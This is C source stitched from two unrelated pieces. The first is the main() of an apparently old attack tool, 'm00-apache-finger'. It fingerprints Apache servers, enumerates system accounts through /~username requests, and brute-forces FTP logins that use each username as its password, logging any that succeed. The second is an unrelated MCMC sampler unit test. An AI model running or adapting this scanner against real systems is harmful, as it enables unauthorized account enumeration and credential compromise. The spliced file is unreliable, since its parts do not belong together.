int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;
char c200[0x05] =
"\x20\x32\x30\x30\x20";
char c403[0x0e] =
"\x34\x30\x33\x20\x46\x6f"
"\x72\x62\x69\x64\x64\x65\x6e";
char c404[0x0e] =
"\x34\x30\x34\x20\x4e\x6f\x74"
"\x20\x46\x6f\x75\x6e\x64";
char signature[0x0f] =
"\x53\x65\x72\x76\x65\x72\x3a"
"\x20\x41\x70\x61\x63\x68\x65";
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: m00-apache-finger\r\n"
"Connection: close\r\n\r\n";
char **logz;
m00();
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}
if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }
if(lfile && (logfile = fopen(lfile, "a")) == 0) {
printf("[-] unable to open logfile [%s]\n",lfile);
exit(0);
}
if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]\n",file);
exit(0);
}
logz = (char **)malloc(0x666);
printf("[*] Checking http server [%s:%i]...\n",host,port);
hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => ");
if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n");
close(hand);
hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);
printf("\n[*] Searching for system accounts...");
if(lfile) {
sprintf(logd,"Host: %s\nFound accounts:\n",host);
fprintf(logfile,logd);
}
x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == '\n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '\0';
x++;
printf("\n %s \t=> ",buf);
hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
if(!strstr(answer,c404)) {
printf(" yes",buf);
if(lfile) {
sprintf(logd,"%s\n",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("\n[*] Searching complete.\n");
printf(" %i users checked\n %i users found\n",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:\n");
fprintf(logfile,logd);
}
printf("[*] Attempting to log on ftp with login:login...\n");
while(x!=f) {
printf(" %s:%s \t=>",logz[x],logz[x]);
hand = conn(host,fport);
sprintf(request,"USER %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
sprintf(request,"PASS %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yes\n");
if(lfile) {
sprintf(logd,"%s:%s\n",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" no\n");
close(hand);
x++;
}
printf("[*] Complete.\n");
printf(" %i ftp accounts found\n",i);
}
if(lfile) {
fprintf(logfile,"\n");
fclose(logfile);
}
}
void Testrapt(CuTest* tc) {
gsl_vector* x = gsl_vector_alloc(DIM);
gsl_vector_set_all(x, 0.0);
gsl_rng* rng = gsl_rng_alloc(gsl_rng_default);
gsl_matrix* sigma_whole = gsl_matrix_alloc(DIM, DIM);
gsl_matrix_set_identity(sigma_whole);
gsl_matrix* sigma_local[K];
for(int k=0; k<K; k++) {
sigma_local[k] = gsl_matrix_alloc(DIM, DIM);
gsl_matrix_set_identity(sigma_local[k]);
}
double means[K];
double variances[K];
double nk[K];
for(int k=0; k<K; k++) {
means[k] = 0.0;
variances[k] = 0.0;
nk[k] = 0.0;
}
double mean = 0.0;
double variance = 0.0;
mcmclib_amh* s = mcmclib_rapt_alloc(rng,
dunif, NULL, /*target distrib.*/
x, T0,
sigma_whole, K, sigma_local,
which_region, NULL, NULL);
rapt_suff* suff = (rapt_suff*) s->suff;
/*Main MCMC loop*/
gsl_matrix* X = gsl_matrix_alloc(N, DIM);
gsl_vector* which_region_n = gsl_vector_alloc(N);
for(size_t n=0; n<N; n++) {
mcmclib_amh_update(s);
gsl_vector_view Xn = gsl_matrix_row(X, n);
gsl_vector_memcpy(&(Xn.vector), x);
gsl_vector_set(which_region_n, n, (double) which_region(NULL, x));
means[which_region(NULL, x)] += x0;
variances[which_region(NULL, x)] += x0 * x0;
nk[which_region(NULL, x)] += 1.0;
mean += x0;
variance += x0 * x0;
}
/*compute means and variances*/
mean /= (double) N;
variance = variance / ((double) N) - (mean * mean);
for(size_t k=0; k<K; k++) {
means[k] /= nk[k];
variances[k] = (variances[k] / nk[k]) - (means[k] * means[k]);
}
/*check results*/
CuAssertDblEquals(tc, mean, v0(suff->global_mean), TOL);
CuAssertDblEquals(tc, variance, m00(suff->global_variance), TOL);
static char kmsg[3];
for(size_t k=0; k<K; k++) {
sprintf(kmsg, "%zd", k);
CuAssertDblEquals_Msg(tc, kmsg, nk[k], gsl_vector_get(suff->n, k), TOL);
CuAssertDblEquals_Msg(tc, kmsg, means[k], v0(suff->means[k]), TOL);
CuAssertDblEquals_Msg(tc, kmsg, variances[k], m00(suff->variances[k]), TOL);
}
/*free memory*/
gsl_matrix_free(X);
for(int k=0; k<K; k++)
gsl_matrix_free(sigma_local[k]);
gsl_matrix_free(sigma_whole);
gsl_vector_free(x);
mcmclib_amh_free(s);
gsl_rng_free(rng);
gsl_vector_free(which_region_n);
}
